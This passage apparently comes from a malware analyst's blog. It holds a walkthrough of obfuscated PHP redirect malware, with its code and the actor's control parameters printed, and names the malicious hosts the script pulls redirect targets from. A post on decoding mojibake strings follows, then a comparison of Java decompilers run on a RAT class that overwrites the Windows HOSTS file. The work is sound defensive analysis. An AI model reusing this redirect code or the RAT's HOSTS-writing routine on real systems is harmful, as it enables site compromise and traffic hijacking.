    $_1=file_get_contents($_SERVER['SCRIPT_FILENAME'].'.count');
    echo $_1;
    exit;
}

if(isset($_GET['bbb']) AND $_GET['bbb']=='ccc'){
    if(unlink($_SERVER['SCRIPT_FILENAME'].'.count')){
        echo 'Null count ok';
    }else{
        echo 'ERROR null count((';
    }
    exit;
}


if(!empty($_SERVER['HTTP_USER_AGENT'])){
    $_2=array('MSIE','Firefox','Opera');
    $_3=array('Windows');

    if(preg_match('/'.implode('|',$_2).'/i',$_SERVER['HTTP_USER_AGENT'])){
        if(preg_match('/'.implode('|',$_3).'/i',$_SERVER['HTTP_USER_AGENT'])){
            $_4=@file_get_contents($_SERVER['SCRIPT_FILENAME'].'.count');
            if($_4=='' or $_4==false) $_4=round(0);
            $_5=@fopen($_SERVER['SCRIPT_FILENAME'].'.count','w');
            @flock($_5,LOCK_EX);
            @fputs($_5,$_4+round(0+1));
            @flock($_5,LOCK_UN);
            @fclose($_5);
            $_6=$_0.'/iframe2.txt';
            $_7=round(0+300);
            $_8='http://ya.ru/';

            if (!$_6) exit();
            $_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) : array('last'=>round(0),'url'=>$_8);

            if($_9['last']<time()-$_7){
                if($_9['url']=file_get_contents($_6)){
                    $_9['last']=time();
                    $_10=fopen('settings.json','w');
                    flock($_10,LOCK_EX);
                    fputs($_10,serialize($_9));
                    flock($_10,LOCK_UN);
                    fclose($_10);
                }
            }
            $_11 = $_9['url'] ? $_9['url'] : $_8;
            if(substr($_11,round(0),round(0+1+1+1+1))!='http') $_11='http://'.$_11.'/';
            header("Location: $_11");
            exit;
        }
    }
}
header('HTTP/1.1 404 Not Found');
?>

Let's walk through this a bit. The code has multiple paths, depending on various inputs. These inputs are passed along as URI values:

if(isset($_GET['qwe123']) AND $_GET['qwe123']=='123qwe'){

This line is responsible for checking for a URI field named "qwe123", such as:

http://www.website.com/a.php?qwe123=123qwe

If that field contains the value "123qwe", then this section of code is executed. This section looks for a file named "ololo.txt" in the same directory as the malicious code and attempts to delete it (unlink()). If the file still exists afterward, it displays "NO WORK, NOT WRITIBLE" in the web session. Otherwise, the code recreates the file (touch()) and checks that it is writable. This file exists solely for the code to determine if it has write permissions to the folder via the web. It also ensures that it can reach the malicious domain by retrieving hxxp://gayleecher.com:81/iframe.txt and ensuring that this file contains the text "test". If both checks pass, the test file is deleted and "work" is displayed; if not, "NO WORK, NOT GET URL" is displayed.

if(isset($_GET['aaa']) AND $_GET['aaa']=='aaa'){

This line checks for a URI field named "aaa" and ensures it contains the value of "aaa". If so, it will retrieve the code's current file name, append ".count" to the end of the name, and determine if that file exists in the current web folder. For example, a.php would look for a.php.count. If it exists, the contents will be displayed in the web session.

if(isset($_GET['bbb']) AND $_GET['bbb']=='ccc'){

This line checks for a URI field named "bbb" and ensures it contains the value of "ccc". If so, it will locate the aforementioned .count file and delete it.
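
The three control branches above can be modeled outside of PHP to check which one a given URL would trigger. The sketch below is a rough Python stand-in, not part of the sample: the function name `control_branch` and the branch labels are made up for illustration, and it only mirrors the order and values of the three checks.

```python
from urllib.parse import parse_qs, urlsplit

def control_branch(url):
    """Return a label for the control branch a request URL would trigger."""
    query = parse_qs(urlsplit(url).query)

    def value(name):
        # First value for the field, or None when the field is absent.
        return query.get(name, [None])[0]

    # The checks run in the same order as in the decoded script.
    if value("qwe123") == "123qwe":
        return "self-test"
    if value("aaa") == "aaa":
        return "read counter"
    if value("bbb") == "ccc":
        return "reset counter"
    return "default"

print(control_branch("http://www.website.com/a.php?qwe123=123qwe"))
print(control_branch("http://www.website.com/a.php?bbb=ccc"))
print(control_branch("http://www.website.com/a.php"))
```

A helper like this is handy when reviewing web server logs for requests that match the actor's control parameters.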

Lacking any submitted values, the code performs its default routine. This begins by ensuring that the visitor is using a Windows-based machine running Internet Explorer, Firefox, or Opera, based upon the browser's user-agent. The code then updates its ".count" file to increment the counter by one. A request is then made to retrieve the contents of hxxp://gayleecher.com:81/iframe2.txt. This file currently contains:

http://s2s2s2.in/?id=123

Afterward is a line that would confuse many not familiar with ternary logic commands:

$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) :array('last'=>round(0),'url'=>$_8);

A ternary operation checks a logical condition to see if it is true or false. If true, it returns one set of data; if false, another.

result = condition ? result_true : result_false

In this case, does the file "settings.json" exist? If so, then read the contents through unserialize() (which takes raw data and forms it into logical arrays) and place the resulting arrays into $_9. If "settings.json" does not exist, then create a new array with a "last" field of 0 and a "url" field that contains $_8 ("http://ya.ru/").
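
For readers more at home in Python, the same either/or choice can be written as a conditional expression. This is a loose analogy rather than a port: the file check and unserialize() call are replaced by a `saved` parameter (None standing in for a missing settings.json), and the names `load_settings` and `DEFAULT_URL` are made up for the example.

```python
DEFAULT_URL = "http://ya.ru/"  # the hardcoded fallback held in $_8

def load_settings(saved):
    """Use the saved settings when present, otherwise fall back to defaults."""
    return saved if saved is not None else {"last": 0, "url": DEFAULT_URL}

print(load_settings(None))
print(load_settings({"last": 1375000000, "url": "http://s2s2s2.in/?id=123"}))
```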

The "url" field in this array is then set to the contents of the iframe2.txt file above, and the "last" field set to the current date and time as an epoch value. The values are then written to "settings.json".

Another aspect of this is the time frequency of connections. This can be determined by examining the following lines:
$_7=round(0+300);
if($_9['last']<time()-$_7){

This code sets $_7 to "300", with the "round(0+" wrapper being cruft code that can be ignored. The sample then checks to see if the "last" check-in time is less than the current time (as an epoch) minus 300 seconds, or 5 minutes. In essence, if it's been longer than 5 minutes since checking in with iframe2.txt, the sample will check in to acquire the latest URL to connect to.
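The comparison is easy to get backwards, so here is a minimal Python restatement of it. The function and constant names are my own, not the sample's.

```python
import time

CHECK_INTERVAL = 300  # seconds; the value left in $_7 once round(0+300) is evaluated


def needs_refresh(last_checkin, now=None, interval=CHECK_INTERVAL):
    """Mirror of the PHP test: $_9['last'] < time() - $_7."""
    if now is None:
        now = time.time()
    return last_checkin < now - interval
```

A "last" value of 0, as found in the default array, always triggers a refresh, so a freshly planted copy of the script checks in on its first visitor.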

Later logic ensures that there is a URL set. If not, it will default to the hardcoded address of "http://ya.ru". For additional checking, the sample then ensures that the URL begins with the text "http". If not, it prepends "http://" and appends a trailing slash to create a valid URL:

if(substr($_11,round(0),round(0+1+1+1+1))!='http')$_11='http://'.$_11.'/';
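The fallback and prefix checks just described can be restated in Python as a rough sketch. `normalize_redirect` is a hypothetical name, and the slice `url[:4]` plays the part of substr() with the decoded arguments 0 and 4.

```python
def normalize_redirect(url, fallback="http://ya.ru"):
    """Apply the sample's two sanity checks to a redirect target."""
    if not url:
        url = fallback  # nothing retrieved: use the hardcoded address
    if url[:4] != "http":
        url = "http://" + url + "/"  # bare hostname: wrap it into a URL
    return url


print(normalize_redirect("s2s2s2.in"))  # prints: http://s2s2s2.in/
```

Note that the check only looks at the first four characters, so any value beginning with "http" passes through untouched.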

The point to this entire script comes at the very end:

header("Location: $_11");

This is a slightly obscure PHP call that appends a raw HTTP header field to the outgoing response. In this case, it adds a "Location: " field used to redirect the client to a new web site.

So let's sit back and take in what we know.

This is obfuscated PHP code that sits on a web server. When visited by a home user, the code will query gayleecher.com to retrieve a redirect URL. It saves this to a local file named "settings.json" and then redirects the home user to the same URL. All the while, a counter is being saved in the background that logs how many total home users are redirected. The actor can query this information by passing certain arguments to see how many total users were redirected.

At this time, all users are redirected to:

http://s2s2s2.in/?id=123

I hope this was insightful to anyone learning web attack analysis. I am a big fan of obfuscation, encoding, and encryption and love to tear apart such samples. As I've joked about, this is like Sudoku as a relaxing yet challenging exercise that more people should learn :)

Mojibaked Malware: Reading Strings Like Tarot Cards

One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to represent each character. The world has yet to recover from the shock of this great invention and modern programmers cry themselves to sleep while fighting with Unicode strings.

For a malware analyst, this typically comes about while analyzing code that's beyond the standard trojan, which typically contains no output. Analyzing C2 clients (servers in other contexts) and decoy documents requires being able to identify the correct code page for strings so that they appear correctly, can be attributed to a language, and can then be translated.

ASCII proper covers byte values 0-127, and the single-byte code pages extend that to the full range of 0-255, so every character occupies one byte of storage. UTF-8 extends upon this by using a single byte where possible, but also allowing variable-length sequences of two or more bytes, whose leading bits signal how many bytes make up the character. If you see a string of text that looks like ASCII, but then randomly contains unknown characters, it is likely UTF-8, such as:

C:\users\brian\樿鱼\malware.pdb
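To see the variable-length behavior on that exact path, a quick Python check is enough. This is just a sketch; `utf8_widths` is a hypothetical helper name.

```python
path = "C:\\users\\brian\\樿鱼\\malware.pdb"


def utf8_widths(text):
    """Return (character, number of UTF-8 bytes) pairs for each character."""
    return [(ch, len(ch.encode("utf-8"))) for ch in text]


widths = dict(utf8_widths(path))
print(widths["C"], widths["樿"], widths["鱼"])  # prints: 1 3 3
```

The ASCII portion costs one byte per character, while each of the two Chinese characters expands to three bytes.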

Code pages, UTF-16, and even UTF-32, provide additional challenges by providing little context to the data involved. However, I hope that by this point in 2013 we don't need to continually harp on what Unicode is...

For most analysts, their exposure to Unicode is being confronted with unknown text, and then trying to figure out how to get it back into its original language. This text, when illegible, is known as mojibake, a Japanese term for "writing that changes". The data is correct, and it does mean something to someone, but the wrong encoding is being applied. This results in text that looks, well... wrong.

Most analysts have gotten into the habit of searching for unknown characters then guessing which code page or encoding to apply until they produce something that looks legible. This does eventually work, but is a clumsy science. We all have our favorites to try: GB2312, Big5, Cyrillic, 8859-2, etc. But, let's just keep this short and sweet and show you a tool that your peers likely already know about but forgot to show you.
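That guess-and-check habit is simple to script. Below is a rough Python sketch that decodes the same bytes under several candidates and keeps whichever decode without error. The candidate list is only my assumption of a reasonable starting set, and the sample bytes are a stand-in I made up, not data from a real sample.

```python
CANDIDATES = ["utf-8", "gb2312", "big5", "cp1251", "iso8859_2"]


def try_codepages(raw, candidates=CANDIDATES):
    """Decode raw bytes under each candidate; keep the ones that decode cleanly."""
    results = {}
    for name in candidates:
        try:
            results[name] = raw.decode(name)
        except UnicodeDecodeError:
            continue  # not valid under this encoding, move on
    return results


sample = "恶意软件".encode("gb2312")  # stand-in bytes for illustration only
for name, text in try_codepages(sample).items():
    print(name, repr(text))
```

A clean decode is not proof of the right answer, since single-byte code pages will accept almost anything. A human eye still has to judge which output is legible.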



When dealing with direct strings, such as:

C:\users\brian\樿鱼\malware.pdb

That small section of unknown data in the middle is mojibake. The problem you'll find is that if this string of text is stored within a binary file, such as an executable, using a tool like 'strings' will miss it. 'strings' will instead return two strings: "C:\users\brian\" and "malware.pdb", completely missing the folder name that's UTF-8 Chinese. 
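The split is easy to reproduce. The sketch below imitates the default behavior of 'strings' with a regular expression over printable ASCII. It is not the tool's actual implementation, and `ascii_strings` is a name of my own.

```python
import re


def ascii_strings(data, min_len=4):
    """Return runs of printable ASCII that are at least min_len bytes long."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


path = "C:\\users\\brian\\樿鱼\\malware.pdb"
blob = b"\x00\x01" + path.encode("utf-8") + b"\x00"  # path embedded in binary data
print(ascii_strings(blob))  # prints: [b'C:\\users\\brian\\', b'\\malware.pdb']
```

Every byte of the UTF-8 folder name is above 0x7E, so the run of printable characters breaks there and the name silently disappears from the output.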

My preferred method for dealing with these is to simply paste the string into Notepad++. It can natively translate to UTF-8 or various code pages on the fly. Just make sure that you're in ANSI mode when you paste it in.

For graphical applications it's a bit more difficult. Take, for instance, this series of text from a malware C2 client:


This is mojibake. The standard way that most people get around this issue is to identify the code page from the application, usually by using an application like ExifTool, setting their system to use that language pack as the primary, then rebooting and running the application again. This works, but is cumbersome. Others take VM snapshots of their analysis system in various languages, then just revert to the appropriate language to extract the language strings as needed.

The problem deepens when an application has a mixture of correct strings alongside mojibake strings, such as this program does:


The proper strings are the result of the program containing a String/Dialog resource with appropriate language settings applied. This program, viewed with Cerbero's PEInsider, showed Menus and Dialogs with proper settings applied (2052 - Chinese Simplified):


However, for its string table, the application features virtually no entries at all. Just a string of "A" and "B".



This provides part of the picture, but doesn't encompass all of the strings we may run across, especially for those created dynamically at runtime.

The preferred way is to use a little-known, but also widely-known, Microsoft tool named AppLocale. AppLocale will run an application in a specific, chosen code page and provide native translation. All that is required is for you to have the appropriate language pack installed, without having to make it the OS's primary language.

However, there are multiple issues with AppLocale. It's a GUI loader that displays the supported languages in their native written format, as shown below, making it impossible to know which is which unless you already know the language.


Good luck with that. Especially when you jump between eight languages in a given week.

AppLocale does allow for command line execution, but requires you to know a specific four-digit number. That number is Microsoft's Locale ID written in hexadecimal, a form that's relatively unknown to outsiders. For instance, with Simplified Chinese, they use Locale ID 0804, the hexadecimal form of the universally known decimal 2052.
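Since 0804 read as hexadecimal equals 2052 in decimal, converting between the two forms is a one-liner in Python. The function names here are my own and purely illustrative.

```python
def lcid_to_hex(lcid_decimal):
    """Format a decimal Locale ID as a four-digit hexadecimal string."""
    return format(lcid_decimal, "04X")


def hex_to_lcid(code):
    """Turn the four-digit hexadecimal form back into the decimal Locale ID."""
    return int(code, 16)


print(lcid_to_hex(2052))    # prints: 0804
print(hex_to_lcid("0804"))  # prints: 2052
```

This makes it painless to go from the language ID shown by a resource viewer to the value the command line expects.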

To simplify the process, I threw together a quick script over the weekend that provides the full list of Locale IDs, from which one is selected. It then creates a new option on the right-click context menu for executable files. That's it, nothing major.

The effect is instantaneous though. Edit the script and uncomment the language of your choice, then run the script as an account with administrative access. From there, you can simply right click on any executable and select "Execute with AppLocale". The applications should then show up in their native language without any reboots, like our text below from the earlier C2 client:


Note: If instead of the program running, AppLocale gives you a setup window, then you likely do not have that specified language pack installed.

Software:
Microsoft AppLocale: http://www.microsoft.com/en-us/download/details.aspx?id=13209
RightClick_AppLocale: https://github.com/Rurik/RightClick_AppLocale/blob/master/RCAppLocale.py



Further Fun Reading:
Do You want Coffee with That Mojibake: http://iphone.sys-con.com/node/44480
Unicode Search of Dirty Data, Or: How I Learned to Stop Worrying and Love Unicode Technical Standard #18: Slide Deck (PDF) | White Paper
Russian Post Office fixes mojibake on the fly: http://en.wikipedia.org/wiki/File:Letter_to_Russia_with_krokozyabry.jpg

Malware Analysis: The State of Java Reversing Tools

In the world of incident response and malware analysis, Java has always been a known constant. While many malware analysts are monitoring more complex malware applications in various languages, Java is still the language of love for drive-by attacks on common end-users. It can usually be said with certainty that any home user infection with malware such as Zeus, Citadel, Carberp, or ZeroAccess originated through a Java vulnerability and exploit. In typical crimeware (banking/financial theft malware) incidents, one group specializes in the backend malware (e.g. Zeus) while outsourcing the infection and entrenchment to a second group that creates exploit software like BlackHole, Neosploit, and Fiesta.

In many incident responses, I've seen analysts gloss over the Java infection vector as just an end-note. Once they see the final-stage malware on the system they write off the Java component as just a downloader without any real analysis. This creates issues for the times when the Java exploit only partially succeeds resulting in malicious Java JAR files on a system but no Trojan or malware.

Why did it fail? Was the system properly patched to prevent a full infection? Was there a permission setting that stopped the downloader in its tracks? These are the questions that typically force an analyst to begin analyzing Java malware.

I've discussed Java quite a bit on this blog in the past. My Java IDX cache file parser was made for the purpose of identifying files downloaded via Java, be they Windows executables or additional Java JAR files. In that same post I analyzed Java from a Fiesta exploit kit that installed a ZeroAccess trojan onto an analyzed system.

Though Java is not my forte, I've had to face it enough to find that there are many weaknesses and gaps in the tools used for analysis. What I found is that most analysts have been using the same, outdated tools in every case. If the tool fails, they just move on and don't finish their analysis. All the while, new applications are being released that are worthy of note. I felt it worthy to do an annual check-up of the state of analysis tools to display what is available and what weaknesses each holds. There have been similar efforts by others in the past, with the most recent I've found being one in 2010 on CoffeeBreaks, by Jerome.


This post was intended to be much larger and in-depth, delving into how each analysis tool manages decompilation and why they fail, but due to time and resources it was cut short.

The Setup

For this comparison I will be using code from a Java RAT that is in active development. Due to this active development, I will not name the RAT nor provide any files for download.

The malware used is obfuscated by a well-known Java obfuscation tool named Zelix KlassMaster (ZKM). ZKM has been discussed widely in the industry for years and I gave a presentation on how to identify and reverse its string encryption at a NoVA Hackers! (NoVAH!) meeting in May of 2012.

Due to this obfuscation, we will be building a matrix of results in which each decompiler is matched with two well-known Java deobfuscators: JMD and JDO.

As it seems to be common with all Java analysis tools, many discussed here are no longer in development and have been left abandoned. However, in many cases, they still work for a majority of malicious samples.

Deobfuscators:
Deobfuscators work by detecting known obfuscation methods, such as renaming variables, classes, and functions, as well as basic string encoding. While many of these methods are specific to known obfuscators, generic deobfuscation can be performed by searching for a routine that runs against encoded strings, then calling that routine externally against the strings.

JMD is one open-source deobfuscator, written in Java, but also available as a .NET 2.0 (64-bit d/l) executable. It runs directly against a JAR file and produces a deobfuscated JAR as a result. It provides the following deobfuscation methods:
  • Allatori
  • DashO
  • Generic string encoding
  • JShrink
  • SmokeScreen
  • Zelix KlassMaster (ZKM)

JDO (Java DeObfuscator) is open-source Java, as well, and is provided as a .NET 2.0 executable. Unlike JMD, it will only operate against a Java Class file. This will require you to manually unzip a JAR file, then run JDO against each individual Class file. It will attempt to automatically detect and deobfuscate data through generic means.
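Because a JAR is just a ZIP archive, the manual unzip step is easy to script. The Python sketch below pulls out only the Class files and returns their paths so they can be fed to JDO one at a time. `extract_classes` is a hypothetical helper, and no JDO command line is assumed here.

```python
import os
import zipfile


def extract_classes(jar_path, out_dir):
    """Unzip a JAR and return the paths of the extracted .class files."""
    extracted = []
    with zipfile.ZipFile(jar_path) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                # extract() returns the path of the file it created
                extracted.append(jar.extract(name, out_dir))
    return sorted(extracted)
```

Manifest files and other resources are skipped, which keeps the working folder limited to what the deobfuscator can actually process.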

Decompilers:
JD-GUI is probably the most widely used decompiler. It features a well-thought out GUI as well as the ability to parse entire JAR files. However, its current hosting site is unavailable, though the site is mirrored elsewhere. For updates, refer to the Twitter page of Emmanuel Dupuy.

The various forms of JD-GUI
For the purpose of this post, the latest version of JD-GUI was used. However, this version may be lacking the functionality of other versions of "JD". Recently, a greater deal of development has been performed by the JD-GUI developer on JD-Core / JD-IntelliJ.

JAD is a free decompiler, though one that has been discontinued for many years, and as such has many problems with newer iterations of the Java Development Kit (JDK). Its original web domain is gone, and the project is now hosted elsewhere. It's a basic, command-line tool that has been used as the backend to multiple other Java decompilers.

FernFlower was a free decompiler that appeared around 2009 and was unique for being a web-based decompiler. In 2011, an offline JAR file was made available, and the website taken down shortly after. It's currently used as the backend to many commercial decompilers, such as AndroChef and DJ Java Decompiler. Notably, it's currently available bundled in with the Minecraft Coder Pack.

Procyon is a recently released, open-source decompiler. It is currently in active development and, while a command-line tool, does have two GUI front-ends available: Luyten and SecureTeam's Decompiler. Procyon is available on Bitbucket.

Other decompilers that were not included in the scope of this post:
CFR
JReversePro
Krakatau - Python-based decompiler

Disassemblers:
As reversers know, decompilation is an immature science. Certain liberties are taken to assume and guess what code is doing in order to make readable source. The most accurate method is to simply view the raw data itself as compiled Java bytecode. For those situations, reJ provides an excellent GUI front end, and the ability to modify code on-the-fly.

Eclipse plugins
Some decompilers have Eclipse IDE plugins available. Eclipse IDE is currently the prominent environment for Java development, and such plugins allow for code to be reversed directly into a new project for debugging and analysis.


Test 1: Simple file writing function.

The first test will be against an obfuscated class function that allows the RAT to save network-transmitted data to the local Windows HOSTS file to override DNS resolutions.

JD-GUI (raw class file)

import java.io.FileWriter;

public class ec extends u
{
private static final String[] z;

public void b(String paramString)
{
int i = c.db; String str = s.b();
try { if (i != 0) break label140; if (b.a() != b.f) break label128; } catch (Exception localException2) { throw localException2; }
try {
FileWriter localFileWriter = new FileWriter(System.getenv(z[4]) + z[2]);
localFileWriter.write(str);
localFileWriter.close();
s.b(z[1]);
s.b(""); } catch (Exception localException1) {
} try {
s.b(z[1]);
s.b(z[3] + localException1.getMessage());

if (i == 0) return;
label128: s.b(z[1]); } catch (Exception localException3) { throw localException3; }
label140: s.b(z[0]);
}

From this analysis, we have little to work off of. We see the java.io.FileWriter class in use, so we know that file activity is taking place, but all strings are replaced with array lookups of z[#]. Let's attempt this again after running the class file through a deobfuscator.

JD-GUI (JDO Deobfuscated)

import java.io.FileWriter;

public class Class_ec extends u
{
private static final String[] var_3a2;

public void sub_3ed(String paramString)
{
int i = c.db; String str = s.b();
try { if (i != 0) break label140; if (b.a() != b.f) break label128; } catch (Exception localException2) { throw localException2; }
try {
FileWriter localFileWriter = new FileWriter(System.getenv(var_3a2[4]) + var_3a2[2]);
localFileWriter.write(str);
localFileWriter.close();
s.b(var_3a2[1]);
s.b(""); } catch (Exception localException1) {
} try {
s.b(var_3a2[1]);
s.b(var_3a2[3] + localException1.getMessage());

if (i == 0) return;
label128: s.b(var_3a2[1]); } catch (Exception localException3) { throw localException3; }
label140: s.b(var_3a2[0]);
}

static
{
// Byte code:
// 0: iconst_5
// 1: anewarray 13 java/lang/String
// 4: dup
// 5: iconst_0
// 6: ldc 4
... Reduced for brevity ...
//   156: invokespecial 97 java/lang/String:<init> ([C)V
// 159: invokevirtual 100 java/lang/String:intern ()Ljava/lang/String;
// 162: swap
// 163: pop
// 164: swap
// 165: tableswitch default:+-152 -> 13, 0:+-143->22, 1:+-134->31, 2:+-125->40, 3:+-116->49
}
}

Well, that was awkward. JDO did attempt to rename the string array from 'z' to 'var_3a2', but its edits exposed ZKM's string decryption function. This function was unable to be decompiled by JD-GUI and appears as disassembled code. Oddly, this function was not seen by JD-GUI on the raw class file. But, nothing usable here. Similar results were found when using JDO with other decompilers, so further use in this post was stopped.

JD-GUI (JMD Deobfuscated)

import java.io.FileWriter;

public class ec extends u
{
private static final String[] z;

public void b(String arg0)
{
String str = s.b();
try { if (b.a() != b.f) break label111; } catch (Exception localException2) { throw localException2; }
try {
FileWriter localFileWriter = new FileWriter(System.getenv("SystemDrive") + "\\Windows\\System32\\drivers\\etc\\hosts");
localFileWriter.write(str);
localFileWriter.close();
s.b("HOSTANSW");
s.b(""); } catch (Exception localException1) {
} try {
s.b("HOSTANSW");
s.b("ERR: " + localException1.getMessage()); return;

label111: s.b("HOSTANSW"); } catch (Exception localException3) { throw localException3; }
s.b("Needs to be windows");
}
}

Well, our work here is done! Based on this display we see the Java code resolving the environment variable of SystemDrive (typically C:) and adding the hardcoded path to the HOSTS file. It writes a string that's returned from class 's' function 'b' (s.b()), a function responsible for network communications. The "HOSTANSW" strings are simply transmitted back to the C2, along with the "ERR: " message, if encountered.

In all, JD-GUI combined with JMD was able to give us a "full" analysis of this one class file. Let's try other decompilers.

Procyon (raw class file)

import java.io.*;

public class ec extends u
{
private static final String[] z;

public void b(final String s) {
final int db = c.db;
final String b = s.b();
Label_0140: {
Label_0128: {
try {
if (db != 0) {
break Label_0140;
}
if (b.a() != b.f) {
break Label_0128;
}
}
catch (Exception ex) {
throw ex;
}
try {
final FileWriter fileWriter = new FileWriter(System.getenv(ec.z[4]) + ec.z[2]);
fileWriter.write(b);
fileWriter.close();
s.b(ec.z[1]);
s.b("");
}
catch (Exception fileWriter) {
s.b(ec.z[1]);
final FileWriter fileWriter;
s.b(new StringBuilder(ec.z[3]).append(((Throwable)fileWriter).getMessage()).toString());
if (db == 0) {
return;
}
s.b(ec.z[1]);
s.b(ec.z[0]);
final Object o;
throw o;
}
}
}
}

static{
//
// This method could not be decompiled.
//
// Original Bytecode:
//
// 0: iconst_5
// 1: anewarray Ljava/lang/String;
// 4: dup
// 5: iconst_0
// 6: ldc "_8>f 1)4\" t},k u2,q"
... Reduced for brevity ...
//   165: tableswitch {
// 0: 22
// 1: 31
// 2: 40
// 3: 49
// default: 13
// }
// 196: return
//
// The error that occurred was:
//
// java.lang.IllegalStateException: Inconsistent stack size at #0053.
// at com.strobel.decompiler.ast.AstBuilder.performStackAnalysis(AstBuilder.java:1104)
... Reduced for brevity ...
throw new IllegalStateException("An error occurred while decompiling this method.");
}
}

Interesting results there. Note that Procyon threw an exception at the end for an "Inconsistent stack size". Regardless, the code decompiled fine. It also recognized the ZKM string decryption routine but only provided the disassembled code for it. The decompiled code is almost identical to that provided by JD-GUI but is in a much more structured display. While JD-GUI attempts to group conditions together and compact the function borders ({}), Procyon gives a more formal output, albeit a larger one. Even its disassembled output is more structured, with liberal carriage returns.

Let's now run Procyon with a deobfuscated class file:

Procyon (JMD Deobfuscated)

import java.io.*;

public class ec extends u
{
private static final String[] z;

public void b(final String arg0) {
final String b = s.b();
Label_0111: {
try {
if (b.a() != b.f) {
break Label_0111;
}
}
catch (Exception ex) {
throw ex;
}
try {
final FileWriter fileWriter = new FileWriter(System.getenv("SystemDrive") + "\\Windows\\System32\\drivers\\etc\\hosts");
fileWriter.write(b);
fileWriter.close();
s.b("HOSTANSW");
s.b("");
return;
}
catch (Exception fileWriter) {
s.b("HOSTANSW");
final FileWriter fileWriter;
s.b("ERR: " + ((Throwable)fileWriter).getMessage());
return;
}
try {
s.b("HOSTANSW");
}
catch (Exception ex2) {
throw ex2;
}
}

s.b("Needs to be windows");
}
}

Similar to JD-GUI, we're able to get a clean decompiled analysis of the file. The code produced by the two is nearly identical, with the main difference being in the formal structure of the conditions.

JAD (raw class file)

JAD is commonly the backup to JD-GUI, but is a much outdated model for decompilation and disassembly. One of my favorite features about JAD, though, is that when it does fail to decompile, its disassembly is a good mixture of the two. It disassembles, but attempts to put logic into the disassembly instead of just a blind dump like JD-GUI and Procyon:


import java.io.FileWriter;

public class ec extends u
{

public ec()
{
}

public void b(String s1)
{
String s2;
int i;
i = c.db;
s2 = s.b();
try
{
label0:
{
if(i != 0)
break MISSING_BLOCK_LABEL_140;
if(b.a() != b.f)
break MISSING_BLOCK_LABEL_128;
break label0;
}
}
catch(Exception _ex) {}
FileWriter filewriter = new FileWriter((new StringBuilder(String.valueOf(System.getenv(z[4])))).append(z[2]).toString());
filewriter.write(s2);
filewriter.close();
s.b(z[1]);
s.b("");
break MISSING_BLOCK_LABEL_148;
Exception exception;
exception;
s.b(z[1]);
s.b((new StringBuilder(z[3])).append(exception.getMessage()).toString());
if(i == 0)
break MISSING_BLOCK_LABEL_148;
s.b(z[1]);
break MISSING_BLOCK_LABEL_140;
throw;
s.b(z[0]);
}

private static final String z[];

static
{
String as[] = new String[5];
as;
as;
0;
"_8>f\0071)4\"\026t},k\032u2,q";
-1;
goto _L1
_L7:
JVM INSTR aastore;
JVM INSTR dup;
true;
"Y\022\bV5_\016\f";
false;
goto _L1
_L8:
JVM INSTR aastore;
JVM INSTR dup;
2;
"M\n2l\020~*(^'h./g\031\"o\007f\006x+>p\007M8/a(y2(v\007";
true;
goto _L1
_L9:
JVM INSTR aastore;
JVM INSTR dup;
3;
"T\017\t8T";
2;
goto _L1
_L10:
JVM INSTR aastore;
JVM INSTR dup;
4;
"B$(v\021|\031)k\002t";
3;
goto _L1
... Reduced for brevity ...
JVM INSTR new #13 <Class String>;
JVM INSTR dup_x1;
JVM INSTR swap;
String();
intern();
JVM INSTR swap;
JVM INSTR pop;
JVM INSTR swap;
JVM INSTR tableswitch 0 3: default 13
// 0 22
// 1 31
// 2 40
// 3 49;
goto _L7 _L8 _L9 _L10 _L11
}
}

JAD's decompiler does a fairly decent job, but differs in how it handles exceptions within the code. Let's see how it operates on deobfuscated classes:

JAD (JMD Deobfuscated)


import java.io.FileWriter;

public class ec extends u
{

public ec()
{
}

public void b(String arg0)
{
String s1;
s1 = s.b();
try
{
label0:
{
if(b.a() != b.f)
break MISSING_BLOCK_LABEL_111;
break label0;
}
}
catch(Exception _ex) {}
FileWriter filewriter = new FileWriter((new StringBuilder(String.valueOf(System.getenv("SystemDrive")))).append("\\Windows\\System32\\drivers\\etc\\hosts").toString());
filewriter.write(s1);
filewriter.close();
s.b("HOSTANSW");
s.b("");
break MISSING_BLOCK_LABEL_129;
Exception exception;
exception;
s.b("HOSTANSW");
s.b((new StringBuilder("ERR: ")).append(exception.getMessage()).toString());
break MISSING_BLOCK_LABEL_129;
s.b("HOSTANSW");
break MISSING_BLOCK_LABEL_122;
throw;
s.b("Needs to be windows");
}

private static final String z[];

}

Here we see results similar to what the other tools found. But, as mentioned earlier, the exception handling is very confusing. There are breaks and exceptions inline with functional code. Later conditional sections, such as ensuring that the system is running on Microsoft Windows, are ignored and the code is shown as one series of instructions. All-in-all, it does give us some of the source code in a somewhat reasonable facsimile of the original. While it is excellent as a back-up tool if others fail, I wouldn't rely upon it for my analysis.

What about FernFlower?

FernFlower was a well known and trusted decompiler years ago. Like most decompilers, it fell off the scene silently. The first version was web-based, requiring you to upload your class files for analysis. Later versions were compiled. The FernFlower engine is currently used as the backend for commercial (shareware) products of DJ Decompiler and AndroChef. While competent tools that have built upon the capabilities of FernFlower, they are generally just commercial GUIs for the tool.

Additionally, FernFlower alone failed horribly in all of the tests here. Astonishingly, when confronted with the raw class file, it was unable to decompile or disassemble the main HOSTS writing function. However, it did decompile ZKM's string decryption routine, the exact opposite of what we need:


public class ec extends u {

private static final String[] z;

public void b(String param1) {
// $FF: Couldn't be decompiled
}

static {
String[] var10000 = new String[5];
String[] var10001 = var10000;
byte var10002 = 0;
String var10003 = "_8>f 1)4\" t},k u2,q";
byte var10004 = -1;

while(true) {
char[] var5;
label38: {
char[] var2 = var10003.toCharArray();
int var10006 = var2.length;
int var0 = 0;
var5 = var2;
int var6 = var10006;
if(var10006 > 1) {
var5 = var2;
var6 = var10006;
if(var10006 <= var0) {
break label38;
}
}

do {
char[] var8 = var5;
int var10007 = var0;

while(true) {
char var10008 = var8[var10007];
byte var10009;
switch(var0 % 5) {
case 0:
var10009 = 17;
break;
case 1:
var10009 = 93;
break;
case 2:
var10009 = 91;
break;
case 3:
var10009 = 2;
break;
default:
var10009 = 116;
}

var8[var10007] = (char)(var10008 ^ var10009);
++var0;
if(var6 != 0) {
break;
}

var10007 = var6;
var8 = var5;
}
} while(var6 > var0);
}

String var4 = (new String(var5)).intern();
switch(var10004) {
case 0:
